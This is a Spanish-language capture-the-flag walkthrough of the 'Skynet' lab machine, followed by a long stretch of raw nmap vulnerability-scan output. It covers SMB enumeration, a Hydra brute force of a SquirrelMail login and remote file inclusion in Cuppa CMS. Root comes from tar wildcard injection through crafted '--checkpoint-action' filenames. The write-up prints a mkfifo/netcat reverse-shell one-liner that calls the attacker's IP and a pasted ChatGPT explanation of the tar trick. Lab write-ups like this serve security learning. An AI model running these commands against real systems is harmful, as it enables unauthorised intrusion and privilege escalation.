🦾SKYNET
1. RECONOCIMIENTO:
Al iniciar con el reconocimiento, me centré en la exploración de directorios del sitio web utilizando gobuster y la lista de palabras comunes common.txt de dirb.
gobuster dir -u http://10.10.131.229 -w /usr/share/wordlists/dirb/common.txt Entre los resultados, se destacó el directorio /squirrelmail. Decidí realizar un escaneo de nmap completo para obtener información más detallada y lo guardé en un archivo XML para luego convertirlo a HTML.
nmap -sS -sV -O --script=vuln 10.10.131.229 Esto proporcionó un informe detallado del escaneo de nmap que fue crucial para la siguiente fase.
2.SERVICIO SAMBA SMB COMPARTIO UN RECURSO SIN CREDENCIALES LLAMADO ANONIMOUS:
El escaneo de nmap reveló los puertos 139 y 445 abiertos, indicando que SMB estaba presente. Utilicé smbclient para enumerar los recursos compartidos SMB.
smbclient -L 10.10.131.229/anonimousDescubrí un recurso compartido anónimo y exploré su contenido. Encontré el archivo attention.txt que reveló el nombre de usuario Miles Dyson. Además, en log1.txt encontré un conjunto de contraseñas que usaremos para fuerza bruta al login de squirrelmail a posterior.
3. CREDENCIALES DE FUERZA BRUTA obtenidas con HYDRA y vimos tambien con BURPSUITE:
Decidí utilizar las credenciales encontradas para realizar un ataque de fuerza bruta contra el servicio de correo alojado en /squirrelmail. Utilicé Burp Suite Intruder para realizar el ataque de fuerza bruta.
Después de algún tiempo, obtuve la contraseña cyborg007haloterminator. Inicié sesión en el correo electrónico y encontré la clave para la siguiente tarea que era en el servicio SMB.
Y con HYDRA lo logre con el siguiente comando:
hydra -l miles -P passwdskynet.txt 10.10.131.229 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>" -vv -t 1 -stop4. INICIO EN EL SERVICIO COMPARTIDO POR SAMBA:
Ingresé al recurso compartido SMB milesdyson utilizando las credenciales obtenidas. Exploré el contenido y encontré el archivo important.txt que reveló un directorio secreto oculto.
5. Fuerza bruta de directorio:
Con el directorio oculto /45kra24zxs28v3yd/ descubierto, utilicé gobuster nuevamente para encontrar el panel de administración /administrator que redirige a una página de inicio de sesión en Cuppa CMS.
gobuster dir -u http://10.10.131.229/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt 6. RFI (Inclusión remota de archivos):
Descubrí una vulnerabilidad de LFI y inclusión remota de archivos (RFI) en Cuppa CMS gracias al script de un exploit que decia qeu explotaba esto. Verifiqué la vulnerabilidad al intentar acceder a /etc/passwd a través del sitio web.
Luego, aproveché la vulnerabilidad RFI para incluir un shell PHP remoto (shellpaimon.php) creado con MSFVENOM sirviendolo en mi servidor python desde mi maquina atacante y enviandolo a CUPPA desde RFI en su URL asi: (http://10.10.131.229/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.241.89:8080/shellpaimon.php) y establecer una conexión de escucha con Netcat.
nc -nlvp 4444Visitando la URL con el payload RFI, logré obtener una shell interactiva.
7. Escalada de privilegios:
Al explorar los cron jobs, encontré un script (backup.sh) ejecutado como root. No pude editarlo directamente, asi qeu creamos unos archivos con touch con nombres especiales que luego TAR los tratara mal como si fueran comandos, y como las cron tabs usaban este TAR para comprimir todo lo que estaba en la ruta html los ejecutara como ROOT y ejecutara shell.sh dandono una shell reverssa y obtener una shell de root en nuestroi netcat a la escucha .
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.241.89 4445 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"Con esto, logré obtener una shell de root y completar la máquina.Una máquina Linux vulnerable con temática Terminator.
ESPLICACION DE LA VULNERABILIDAD COMPLETA POR LA QUE SE DIO LA ESCALADA DE PRIVILEGIO:
YO:
mira ahi unas crontab ejecutadas por root, que apuntan a ejecutar este archivo con su contenidio: cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * . y si vemos este script .sh se va al directorio cd /var/www/html y usa tar para comprimir todo lo que hay en el, sera aqui la bulnerabilidad por parte de como trata tar los nombres especiales e los archivos que creamos antes al comprimirlos y en realidad por esta vulnerabilidad los termina ejecutando como root dandome la shell indirectamente como root en mi netcat ?
ChatGPT:
Sí, parece que has identificado correctamente la posible vulnerabilidad en el script backup.sh que se ejecuta a través de las crontabs como root. Vamos a analizarlo en detalle:
bash Copy code #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * . Aquí se explica lo que hace el script:
Cambia al directorio /var/www/html. Utiliza el comando tar para crear un archivo backup.tgz en el directorio /home/milesdyson/backups. tar cf /home/milesdyson/backups/backup.tgz * . indica que se debe incluir todo (*) en el directorio actual (.) en el archivo backup.tgz. Ahora, si recordamos los archivos que creaste anteriormente:
/var/www/html/--checkpoint-action=exec=sh shell.sh /var/www/html/--checkpoint=1 Parece que podrías aprovechar la vulnerabilidad en la forma en que tar maneja los nombres de archivos especiales. Si el script de copia de seguridad (backup.sh) es ejecutado por root, y tar interpreta de manera incorrecta los nombres de archivos especiales, podrías lograr la ejecución de comandos arbitrarios en el contexto de root.
Esto podría ser un caso de inyección de comandos a través de nombres de archivos maliciosos que son interpretados por tar de manera incorrecta. Será necesario realizar pruebas adicionales para confirmar la explotación de esta vulnerabilidad específica.
// Some code
/////////////////////////////////////////// SKYNET ///////////////////////////////////////
Una máquina Linux vulnerable con temática Terminator.
---------------- RECONOCIMIENTO DE LA MAQUINA: -----------
┌──(root㉿kali)-[~]
└─# ping 10.10.37.190
PING 10.10.37.190 (10.10.37.190) 56(84) bytes of data.
64 bytes from 10.10.37.190: icmp_seq=1 ttl=64 time=0.904 ms
64 bytes from 10.10.37.190: icmp_seq=2 ttl=64 time=0.387 ms
64 bytes from 10.10.37.190: icmp_seq=3 ttl=64 time=0.418 ms
^C
--- 10.10.37.190 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2045ms
rtt min/avg/max/mdev = 0.387/0.569/0.904/0.236 ms
------------------ NMAP ----------------
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O --script="vuln" 10.10.37.190
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-03 00:50 UTC
Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:01:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.61% done; ETC: 00:52 (0:00:00 remaining)
Stats: 0:04:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.61% done; ETC: 00:54 (0:00:01 remaining)
Stats: 0:04:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.61% done; ETC: 00:54 (0:00:01 remaining)
Nmap scan report for ip-10-10-37-190.eu-west-1.compute.internal (10.10.37.190)
Host is up (0.00037s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.2p2:
| PRION:CVE-2016-8858 7.8 https://vulners.com/prion/PRION:CVE-2016-8858
| PRION:CVE-2016-6515 7.8 https://vulners.com/prion/PRION:CVE-2016-6515
| PACKETSTORM:140070 7.8 https://vulners.com/packetstorm/PACKETSTORM:140070 *EXPLOIT*
| EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 7.8 https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09 *EXPLOIT*
| EDB-ID:40888 7.8 https://vulners.com/exploitdb/EDB-ID:40888 *EXPLOIT*
| CVE-2016-8858 7.8 https://vulners.com/cve/CVE-2016-8858
| CVE-2016-6515 7.8 https://vulners.com/cve/CVE-2016-6515
| 1337DAY-ID-26494 7.8 https://vulners.com/zdt/1337DAY-ID-26494 *EXPLOIT*
| SSV:92579 7.5 https://vulners.com/seebug/SSV:92579 *EXPLOIT*
| PRION:CVE-2023-35784 7.5 https://vulners.com/prion/PRION:CVE-2023-35784
| PRION:CVE-2016-10009 7.5 https://vulners.com/prion/PRION:CVE-2016-10009
| PACKETSTORM:173661 7.5 https://vulners.com/packetstorm/PACKETSTORM:173661 *EXPLOIT*
| CVE-2023-35784 7.5 https://vulners.com/cve/CVE-2023-35784
| CVE-2016-10009 7.5 https://vulners.com/cve/CVE-2016-10009
| 1337DAY-ID-26576 7.5 https://vulners.com/zdt/1337DAY-ID-26576 *EXPLOIT*
| SSV:92582 7.2 https://vulners.com/seebug/SSV:92582 *EXPLOIT*
| PRION:CVE-2016-10012 7.2 https://vulners.com/prion/PRION:CVE-2016-10012
| PRION:CVE-2015-8325 7.2 https://vulners.com/prion/PRION:CVE-2015-8325
| CVE-2016-10012 7.2 https://vulners.com/cve/CVE-2016-10012
| CVE-2015-8325 7.2 https://vulners.com/cve/CVE-2015-8325
| SSV:92580 6.9 https://vulners.com/seebug/SSV:92580 *EXPLOIT*
| PRION:CVE-2016-10010 6.9 https://vulners.com/prion/PRION:CVE-2016-10010
| CVE-2016-10010 6.9 https://vulners.com/cve/CVE-2016-10010
| 1337DAY-ID-26577 6.9 https://vulners.com/zdt/1337DAY-ID-26577 *EXPLOIT*
| EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
| EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
| EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT*
| EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT*
| CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111
| 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT*
| 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT*
| SSV:91041 5.5 https://vulners.com/seebug/SSV:91041 *EXPLOIT*
| PRION:CVE-2016-3115 5.5 https://vulners.com/prion/PRION:CVE-2016-3115
| PACKETSTORM:140019 5.5 https://vulners.com/packetstorm/PACKETSTORM:140019 *EXPLOIT*
| PACKETSTORM:136234 5.5 https://vulners.com/packetstorm/PACKETSTORM:136234 *EXPLOIT*
| EXPLOITPACK:F92411A645D85F05BDBD274FD222226F 5.5 https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F *EXPLOIT*
| EXPLOITPACK:9F2E746846C3C623A27A441281EAD138 5.5 https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138 *EXPLOIT*
| EXPLOITPACK:1902C998CBF9154396911926B4C3B330 5.5 https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330 *EXPLOIT*
| EDB-ID:40858 5.5 https://vulners.com/exploitdb/EDB-ID:40858 *EXPLOIT*
| EDB-ID:40119 5.5 https://vulners.com/exploitdb/EDB-ID:40119 *EXPLOIT*
| EDB-ID:39569 5.5 https://vulners.com/exploitdb/EDB-ID:39569 *EXPLOIT*
| CVE-2016-3115 5.5 https://vulners.com/cve/CVE-2016-3115
| SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT*
| PRION:CVE-2023-27567 5.0 https://vulners.com/prion/PRION:CVE-2023-27567
| PRION:CVE-2018-15919 5.0 https://vulners.com/prion/PRION:CVE-2018-15919
| PRION:CVE-2018-15473 5.0 https://vulners.com/prion/PRION:CVE-2018-15473
| PRION:CVE-2017-15906 5.0 https://vulners.com/prion/PRION:CVE-2017-15906
| PRION:CVE-2016-10708 5.0 https://vulners.com/prion/PRION:CVE-2016-10708
| PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT*
| MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- 5.0 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT*
| EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT*
| EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT*
| EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT*
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
| CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
| 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 *EXPLOIT*
| PRION:CVE-2019-16905 4.4 https://vulners.com/prion/PRION:CVE-2019-16905
| PRION:CVE-2023-29323 4.3 https://vulners.com/prion/PRION:CVE-2023-29323
| PRION:CVE-2016-6210 4.3 https://vulners.com/prion/PRION:CVE-2016-6210
| EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF 4.3 https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF *EXPLOIT*
| EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF 4.3 https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF *EXPLOIT*
| EDB-ID:40136 4.3 https://vulners.com/exploitdb/EDB-ID:40136 *EXPLOIT*
| EDB-ID:40113 4.3 https://vulners.com/exploitdb/EDB-ID:40113 *EXPLOIT*
| CVE-2023-29323 4.3 https://vulners.com/cve/CVE-2023-29323
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-6210 4.3 https://vulners.com/cve/CVE-2016-6210
| 1337DAY-ID-25440 4.3 https://vulners.com/zdt/1337DAY-ID-25440 *EXPLOIT*
| 1337DAY-ID-25438 4.3 https://vulners.com/zdt/1337DAY-ID-25438 *EXPLOIT*
| PRION:CVE-2019-6110 4.0 https://vulners.com/prion/PRION:CVE-2019-6110
| PRION:CVE-2019-6109 4.0 https://vulners.com/prion/PRION:CVE-2019-6109
| CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110
| CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109
| PRION:CVE-2019-6111 2.6 https://vulners.com/prion/PRION:CVE-2019-6111
| PRION:CVE-2018-20685 2.6 https://vulners.com/prion/PRION:CVE-2018-20685
| CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685
| SSV:92581 2.1 https://vulners.com/seebug/SSV:92581 *EXPLOIT*
| PRION:CVE-2016-10011 2.1 https://vulners.com/prion/PRION:CVE-2016-10011
| CVE-2016-10011 2.1 https://vulners.com/cve/CVE-2016-10011
| PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
| PACKETSTORM:140261 0.0 https://vulners.com/packetstorm/PACKETSTORM:140261 *EXPLOIT*
| PACKETSTORM:138006 0.0 https://vulners.com/packetstorm/PACKETSTORM:138006 *EXPLOIT*
| PACKETSTORM:137942 0.0 https://vulners.com/packetstorm/PACKETSTORM:137942 *EXPLOIT*
|_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT*
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| PACKETSTORM:176334 7.5 https://vulners.com/packetstorm/PACKETSTORM:176334 *EXPLOIT*
| PACKETSTORM:171631 7.5 https://vulners.com/packetstorm/PACKETSTORM:171631 *EXPLOIT*
| OSV:BIT-APACHE-2023-25690 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
| OSV:BIT-APACHE-2022-31813 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
| OSV:BIT-APACHE-2022-23943 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
| OSV:BIT-APACHE-2022-22720 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
| OSV:BIT-APACHE-2021-44790 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
| OSV:BIT-APACHE-2021-42013 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
| OSV:BIT-APACHE-2021-41773 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
| OSV:BIT-APACHE-2021-39275 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
| OSV:BIT-APACHE-2021-26691 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
| OSV:BIT-APACHE-2020-11984 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
| MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- 7.5 https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- *EXPLOIT*
| MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- 7.5 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- *EXPLOIT*
| F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 7.5 https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5 *EXPLOIT*
| EDB-ID:51193 7.5 https://vulners.com/exploitdb/EDB-ID:51193 *EXPLOIT*
| EDB-ID:50512 7.5 https://vulners.com/exploitdb/EDB-ID:50512 *EXPLOIT*
| EDB-ID:50446 7.5 https://vulners.com/exploitdb/EDB-ID:50446 *EXPLOIT*
| EDB-ID:50406 7.5 https://vulners.com/exploitdb/EDB-ID:50406 *EXPLOIT*
| E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 7.5 https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 *EXPLOIT*
| CVE-2023-25690 7.5 https://vulners.com/cve/CVE-2023-25690
| CVE-2022-31813 7.5 https://vulners.com/cve/CVE-2022-31813
| CVE-2022-23943 7.5 https://vulners.com/cve/CVE-2022-23943
| CVE-2022-22720 7.5 https://vulners.com/cve/CVE-2022-22720
| CVE-2021-44790 7.5 https://vulners.com/cve/CVE-2021-44790
| CVE-2021-39275 7.5 https://vulners.com/cve/CVE-2021-39275
| CVE-2021-26691 7.5 https://vulners.com/cve/CVE-2021-26691
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CNVD-2022-73123 7.5 https://vulners.com/cnvd/CNVD-2022-73123
| CNVD-2022-03225 7.5 https://vulners.com/cnvd/CNVD-2022-03225
| CNVD-2021-102386 7.5 https://vulners.com/cnvd/CNVD-2021-102386
| CC15AE65-B697-525A-AF4B-38B1501CAB49 7.5 https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49 *EXPLOIT*
| 9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 7.5 https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 *EXPLOIT*
| 8713FD59-264B-5FD7-8429-3251AB5AB3B8 7.5 https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8 *EXPLOIT*
| 6A0A657E-8300-5312-99CE-E11F460B1DBF 7.5 https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF *EXPLOIT*
| 61075B23-F713-537A-9B84-7EB9B96CF228 7.5 https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228 *EXPLOIT*
| 5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 7.5 https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 *EXPLOIT*
| 5312D04F-9490-5472-84FA-86B3BBDC8928 7.5 https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928 *EXPLOIT*
| 52E13088-9643-5E81-B0A0-B7478BCF1F2C 7.5 https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C *EXPLOIT*
| 3F17CA20-788F-5C45-88B3-E12DB2979B7B 7.5 https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B *EXPLOIT*
| 22DCCD26-B68C-5905-BAC2-71D10DE3F123 7.5 https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123 *EXPLOIT*
| 2108729F-1E99-54EF-9A4B-47299FD89FF2 7.5 https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2 *EXPLOIT*
| 1337DAY-ID-39214 7.5 https://vulners.com/zdt/1337DAY-ID-39214 *EXPLOIT*
| 1337DAY-ID-38427 7.5 https://vulners.com/zdt/1337DAY-ID-38427 *EXPLOIT*
| 1337DAY-ID-37777 7.5 https://vulners.com/zdt/1337DAY-ID-37777 *EXPLOIT*
| 1337DAY-ID-36952 7.5 https://vulners.com/zdt/1337DAY-ID-36952 *EXPLOIT*
| 1337DAY-ID-34882 7.5 https://vulners.com/zdt/1337DAY-ID-34882 *EXPLOIT*
| EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB 7.2 https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB *EXPLOIT*
| EDB-ID:46676 7.2 https://vulners.com/exploitdb/EDB-ID:46676 *EXPLOIT*
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| 1337DAY-ID-32502 7.2 https://vulners.com/zdt/1337DAY-ID-32502 *EXPLOIT*
| OSV:BIT-APACHE-2021-40438 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2021-40438
| OSV:BIT-APACHE-2020-35452 6.8 https://vulners.com/osv/OSV:BIT-APACHE-2020-35452
| FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 6.8 https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8 *EXPLOIT*
| CVE-2021-40438 6.8 https://vulners.com/cve/CVE-2021-40438
| CVE-2020-35452 6.8 https://vulners.com/cve/CVE-2020-35452
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2016-5387 6.8 https://vulners.com/cve/CVE-2016-5387
| CNVD-2022-03224 6.8 https://vulners.com/cnvd/CNVD-2022-03224
| AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C 6.8 https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C *EXPLOIT*
| 8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 6.8 https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2 *EXPLOIT*
| 4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 6.8 https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332 *EXPLOIT*
| 4373C92A-2755-5538-9C91-0469C995AA9B 6.8 https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B *EXPLOIT*
| 36618CA8-9316-59CA-B748-82F15F407C4F 6.8 https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F *EXPLOIT*
| 0095E929-7573-5E4A-A7FA-F6598A35E8DE 6.8 https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE *EXPLOIT*
| OSV:BIT-APACHE-2022-28615 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2022-28615
| OSV:BIT-APACHE-2021-44224 6.4 https://vulners.com/osv/OSV:BIT-APACHE-2021-44224
| OSV:BIT-2023-31122 6.4 https://vulners.com/osv/OSV:BIT-2023-31122
| CVE-2022-28615 6.4 https://vulners.com/cve/CVE-2022-28615
| CVE-2021-44224 6.4 https://vulners.com/cve/CVE-2021-44224
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| OSV:BIT-APACHE-2022-22721 5.8 https://vulners.com/osv/OSV:BIT-APACHE-2022-22721
| OSV:BIT-APACHE-2020-1927 5.8 https://vulners.com/osv/OSV:BIT-APACHE-2020-1927
| CVE-2022-22721 5.8 https://vulners.com/cve/CVE-2022-22721
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| 1337DAY-ID-33577 5.8 https://vulners.com/zdt/1337DAY-ID-33577 *EXPLOIT*
| OSV:BIT-APACHE-2022-36760 5.1 https://vulners.com/osv/OSV:BIT-APACHE-2022-36760
| CVE-2022-36760 5.1 https://vulners.com/cve/CVE-2022-36760
| SSV:96537 5.0 https://vulners.com/seebug/SSV:96537 *EXPLOIT*
| OSV:BIT-APACHE-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
| OSV:BIT-APACHE-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
| OSV:BIT-APACHE-2023-31122 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
| OSV:BIT-APACHE-2023-27522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-27522
| OSV:BIT-APACHE-2022-37436 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-37436
| OSV:BIT-APACHE-2022-30556 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30556
| OSV:BIT-APACHE-2022-30522 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-30522
| OSV:BIT-APACHE-2022-29404 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-29404
| OSV:BIT-APACHE-2022-28614 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28614
| OSV:BIT-APACHE-2022-28330 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-28330
| OSV:BIT-APACHE-2022-26377 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-26377
| OSV:BIT-APACHE-2022-22719 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2022-22719
| OSV:BIT-APACHE-2021-41524 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-41524
| OSV:BIT-APACHE-2021-36160 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-36160
| OSV:BIT-APACHE-2021-34798 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-34798
| OSV:BIT-APACHE-2021-33193 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-33193
| OSV:BIT-APACHE-2021-31618 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
| OSV:BIT-APACHE-2021-30641 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-30641
| OSV:BIT-APACHE-2021-26690 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2021-26690
| OSV:BIT-APACHE-2020-9490 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-9490
| OSV:BIT-APACHE-2020-1934 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-1934
| OSV:BIT-APACHE-2020-13950 5.0 https://vulners.com/osv/OSV:BIT-APACHE-2020-13950
| OSV:BIT-2023-45802 5.0 https://vulners.com/osv/OSV:BIT-2023-45802
| OSV:BIT-2023-43622 5.0 https://vulners.com/osv/OSV:BIT-2023-43622
| F7F6E599-CEF4-5E03-8E10-FE18C4101E38 5.0 https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38 *EXPLOIT*
| EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D 5.0 https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D *EXPLOIT*
| EXPLOITPACK:2666FB0676B4B582D689921651A30355 5.0 https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355 *EXPLOIT*
| EDB-ID:42745 5.0 https://vulners.com/exploitdb/EDB-ID:42745 *EXPLOIT*
| EDB-ID:40909 5.0 https://vulners.com/exploitdb/EDB-ID:40909 *EXPLOIT*
| E5C174E5-D6E8-56E0-8403-D287DE52EB3F 5.0 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT*
| DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT*
| CVE-2023-31122 5.0 https://vulners.com/cve/CVE-2023-31122
| CVE-2022-37436 5.0 https://vulners.com/cve/CVE-2022-37436
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
